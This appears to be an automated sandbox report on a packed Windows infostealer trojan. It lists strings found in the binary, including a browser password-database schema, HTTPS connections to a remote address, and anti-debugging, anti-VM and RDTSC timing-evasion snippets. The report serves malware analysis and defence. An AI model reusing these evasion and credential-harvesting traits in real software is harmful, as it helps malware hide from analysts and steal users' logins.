                Source: wf1Ps82LYF.exe, 00000000.00000003.1462644701.0000000005A1D000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1462698086.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1463114308.0000000005A1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: wf1Ps82LYF.exe, 00000000.00000003.1462644701.0000000005A1D000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1462698086.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1463114308.0000000005A1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: wf1Ps82LYF.exe, 00000000.00000003.1513827510.0000000005AEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                Source: wf1Ps82LYF.exe, 00000000.00000003.1513934245.0000000005D0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
                Source: wf1Ps82LYF.exe, 00000000.00000003.1513934245.0000000005D0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
                Source: wf1Ps82LYF.exe, 00000000.00000003.1513934245.0000000005D0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: wf1Ps82LYF.exe, 00000000.00000003.1513934245.0000000005D0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.8:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.8:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.8:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.8:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.8:49710 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.8:49711 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.8:49712 version: TLS 1.2

                System Summary

                barindex
                Source: wf1Ps82LYF.exeStatic PE information: section name:
                Source: wf1Ps82LYF.exeStatic PE information: section name: .idata
                Source: wf1Ps82LYF.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeCode function: 0_3_059E19E00_3_059E19E0
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeCode function: 0_3_01073F700_3_01073F70
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeCode function: 0_3_01073F700_3_01073F70
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeCode function: 0_3_01073F700_3_01073F70
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeCode function: 0_3_01073F700_3_01073F70
                Source: wf1Ps82LYF.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: wf1Ps82LYF.exeStatic PE information: Section: ZLIB complexity 0.9974983946917808
                Source: wf1Ps82LYF.exeStatic PE information: Section: avxzjrga ZLIB complexity 0.9949793403811793
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: wf1Ps82LYF.exe, 00000000.00000003.1463378371.0000000005A08000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1463596594.00000000059EC000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1486385722.0000000005A81000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1486155234.00000000059EE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: wf1Ps82LYF.exeReversingLabs: Detection: 44%
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile read: C:\Users\user\Desktop\wf1Ps82LYF.exeJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: wf1Ps82LYF.exeStatic file information: File size 1884672 > 1048576
                Source: wf1Ps82LYF.exeStatic PE information: Raw size of avxzjrga is bigger than: 0x100000 < 0x1a3c00

                Data Obfuscation

                barindex
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeUnpacked PE file: 0.2.wf1Ps82LYF.exe.8a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;avxzjrga:EW;vgfnourc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;avxzjrga:EW;vgfnourc:EW;.taggant:EW;
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: wf1Ps82LYF.exeStatic PE information: real checksum: 0x1d90b2 should be: 0x1d2192
                Source: wf1Ps82LYF.exeStatic PE information: section name:
                Source: wf1Ps82LYF.exeStatic PE information: section name: .idata
                Source: wf1Ps82LYF.exeStatic PE information: section name:
                Source: wf1Ps82LYF.exeStatic PE information: section name: avxzjrga
                Source: wf1Ps82LYF.exeStatic PE information: section name: vgfnourc
                Source: wf1Ps82LYF.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeCode function: 0_3_010CE699 pushad ; ret 0_3_010CE69A
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeCode function: 0_3_010CE699 pushad ; ret 0_3_010CE69A
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeCode function: 0_3_010C8DD7 push ebx; retf 0_3_010C8DD8
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeCode function: 0_3_010C47AF push ecx; iretd 0_3_010C47B0
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeCode function: 0_3_010D770D push edx; retf 0_3_010D771A
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeCode function: 0_3_010D6699 push eax; retf 0_3_010D670A
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeCode function: 0_3_010CE699 pushad ; ret 0_3_010CE69A
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeCode function: 0_3_010CE699 pushad ; ret 0_3_010CE69A
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeCode function: 0_3_010D7F18 push ebx; retf 0_3_010D7F1A
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeCode function: 0_3_010D9063 push ecx; iretd 0_3_010D9064
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeCode function: 0_3_010D56FC push esi; retf 0_3_010D5702
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeCode function: 0_3_010D76F8 push edx; iretd 0_3_010D76FA
                Source: wf1Ps82LYF.exeStatic PE information: section name: entropy: 7.9796014648206
                Source: wf1Ps82LYF.exeStatic PE information: section name: avxzjrga entropy: 7.954101941370097

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 8F8244 second address: 8F8251 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 8F8251 second address: 8F7ABC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 nop 0x00000007 jmp 00007F5D20C24761h 0x0000000c push dword ptr [ebp+122D0861h] 0x00000012 jmp 00007F5D20C24767h 0x00000017 call dword ptr [ebp+122D29AAh] 0x0000001d pushad 0x0000001e jmp 00007F5D20C24760h 0x00000023 xor eax, eax 0x00000025 jo 00007F5D20C2475Ch 0x0000002b add dword ptr [ebp+122D1943h], ebx 0x00000031 mov edx, dword ptr [esp+28h] 0x00000035 add dword ptr [ebp+122D18ABh], eax 0x0000003b mov dword ptr [ebp+122D2DD5h], eax 0x00000041 jnp 00007F5D20C24766h 0x00000047 mov esi, 0000003Ch 0x0000004c cld 0x0000004d add esi, dword ptr [esp+24h] 0x00000051 cmc 0x00000052 lodsw 0x00000054 clc 0x00000055 cld 0x00000056 add eax, dword ptr [esp+24h] 0x0000005a mov dword ptr [ebp+122D18ABh], edi 0x00000060 mov ebx, dword ptr [esp+24h] 0x00000064 jmp 00007F5D20C24768h 0x00000069 nop 0x0000006a push edi 0x0000006b push eax 0x0000006c push edx 0x0000006d pushad 0x0000006e popad 0x0000006f rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A75DC6 second address: A75DE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20D3D693h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A75DE0 second address: A75E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F5D20C24765h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007F5D20C2475Eh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A75E0B second address: A75E30 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F5D20D3D698h 0x00000008 jl 00007F5D20D3D686h 0x0000000e pop edi 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A7514B second address: A75172 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5D20C24756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push esi 0x0000000c pop esi 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 jmp 00007F5D20C2475Fh 0x00000015 popad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A75172 second address: A75183 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jc 00007F5D20D3D686h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A75183 second address: A75189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A75189 second address: A751A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5D20D3D697h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A7559C second address: A755A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A755A0 second address: A755A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A755A6 second address: A755AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A756EB second address: A756F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A7946A second address: 8F7ABC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 add dword ptr [esp], 2A9BEF1Eh 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F5D20C24758h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 mov dword ptr [ebp+122D326Eh], esi 0x0000002e push dword ptr [ebp+122D0861h] 0x00000034 mov edx, dword ptr [ebp+122D2DB5h] 0x0000003a call dword ptr [ebp+122D29AAh] 0x00000040 pushad 0x00000041 jmp 00007F5D20C24760h 0x00000046 xor eax, eax 0x00000048 jo 00007F5D20C2475Ch 0x0000004e add dword ptr [ebp+122D1943h], ebx 0x00000054 mov edx, dword ptr [esp+28h] 0x00000058 add dword ptr [ebp+122D18ABh], eax 0x0000005e mov dword ptr [ebp+122D2DD5h], eax 0x00000064 jnp 00007F5D20C24766h 0x0000006a mov esi, 0000003Ch 0x0000006f cld 0x00000070 add esi, dword ptr [esp+24h] 0x00000074 cmc 0x00000075 lodsw 0x00000077 clc 0x00000078 cld 0x00000079 add eax, dword ptr [esp+24h] 0x0000007d mov dword ptr [ebp+122D18ABh], edi 0x00000083 mov ebx, dword ptr [esp+24h] 0x00000087 jmp 00007F5D20C24768h 0x0000008c nop 0x0000008d push edi 0x0000008e push eax 0x0000008f push edx 0x00000090 pushad 0x00000091 popad 0x00000092 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A794F8 second address: A7954A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20D3D68Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007F5D20D3D688h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 mov edx, ebx 0x00000027 push 00000000h 0x00000029 xor si, B401h 0x0000002e push 79F624ACh 0x00000033 push eax 0x00000034 push edx 0x00000035 jo 00007F5D20D3D68Ch 0x0000003b ja 00007F5D20D3D686h 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A7954A second address: A79550 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A79550 second address: A79554 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A796AD second address: A796B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A796B1 second address: A7971F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D337Eh], esi 0x00000010 push 00000000h 0x00000012 mov edx, dword ptr [ebp+122D2C91h] 0x00000018 push F1F235DFh 0x0000001d push edi 0x0000001e push ebx 0x0000001f jmp 00007F5D20D3D696h 0x00000024 pop ebx 0x00000025 pop edi 0x00000026 add dword ptr [esp], 0E0DCAA1h 0x0000002d push 00000003h 0x0000002f push 00000000h 0x00000031 push edi 0x00000032 pushad 0x00000033 xor bx, A3EBh 0x00000038 mov eax, dword ptr [ebp+122D2B0Dh] 0x0000003e popad 0x0000003f pop edx 0x00000040 push 00000003h 0x00000042 mov edx, dword ptr [ebp+122D2C75h] 0x00000048 push 50F5E2F3h 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F5D20D3D68Eh 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A797B8 second address: A797F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dword ptr [esp], eax 0x00000007 mov ecx, ebx 0x00000009 push 00000000h 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007F5D20C24758h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 00000014h 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 push edi 0x00000026 sub dword ptr [ebp+122D2A43h], edi 0x0000002c pop esi 0x0000002d call 00007F5D20C24759h 0x00000032 push eax 0x00000033 push edx 0x00000034 push esi 0x00000035 push eax 0x00000036 pop eax 0x00000037 pop esi 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A797F6 second address: A79805 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A79805 second address: A79809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A79809 second address: A79813 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5D20D3D686h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A79813 second address: A7982E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20C2475Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A7982E second address: A79839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F5D20D3D686h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A79936 second address: A79965 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jne 00007F5D20C24769h 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 jo 00007F5D20C2475Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A79965 second address: A79969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A79969 second address: A79979 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push ecx 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A8A126 second address: A8A138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jng 00007F5D20D3D686h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A8A138 second address: A8A13E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A99F5C second address: A99F62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A97FCF second address: A97FE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20C24763h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A97FE6 second address: A97FEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A97FEC second address: A97FF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
